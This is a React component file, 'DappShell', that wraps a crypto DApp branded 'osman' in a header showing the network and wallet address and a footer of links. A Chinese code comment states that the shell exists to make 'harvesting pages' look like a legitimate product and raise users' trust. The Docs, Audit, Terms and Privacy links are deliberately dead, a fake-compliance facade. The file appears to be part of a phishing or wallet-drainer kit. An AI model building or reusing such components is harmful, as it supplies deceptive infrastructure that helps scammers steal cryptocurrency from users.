import React from 'react';
import './DappShell.css';

/**
 * DApp 通用外壳：品牌头部（logo/网络/钱包）+ 内容 + 底部（伪合规链接）。
 * 让收割页看起来像正经产品，提升信任感。
 */
const DappShell = ({ account, network, children, walletLabel, backTo }) => {
  return (
    <div className="dapp-shell">
      <header className="dapp-header">
        <div className="dapp-header-inner">
          <div className="dapp-header-left">
            {backTo && (
              <button className="dapp-back" onClick={() => { window.location.href = backTo; }} aria-label="Back">
                ←
              </button>
            )}
            <div className="dapp-logo">⬡ osman</div>
          </div>
          <div className="dapp-header-right">
            {network && <span className="dapp-net">{network}</span>}
            {account && (
              <span className="dapp-account">
                {account.slice(0, 6)}...{account.slice(-4)}
              </span>
            )}
            {walletLabel && !account && <span className="dapp-account">{walletLabel}</span>}
          </div>
        </div>
      </header>

      <main className="dapp-main">{children}</main>

      <footer className="dapp-footer">
        <div className="dapp-footer-links">
          <a href="#" onClick={(e) => e.preventDefault()}>Docs</a>
          <a href="#" onClick={(e) => e.preventDefault()}>Audit</a>
          <a href="#" onClick={(e) => e.preventDefault()}>Terms</a>
          <a href="#" onClick={(e) => e.preventDefault()}>Privacy</a>
          <span className="dapp-social">𝕏</span>
          <span className="dapp-social">✈</span>
          <span className="dapp-social">💬</span>
        </div>
        <p className="dapp-copy">© 2026 osman. All rights reserved.</p>
      </footer>
    </div>
  );
};

export default DappShell;
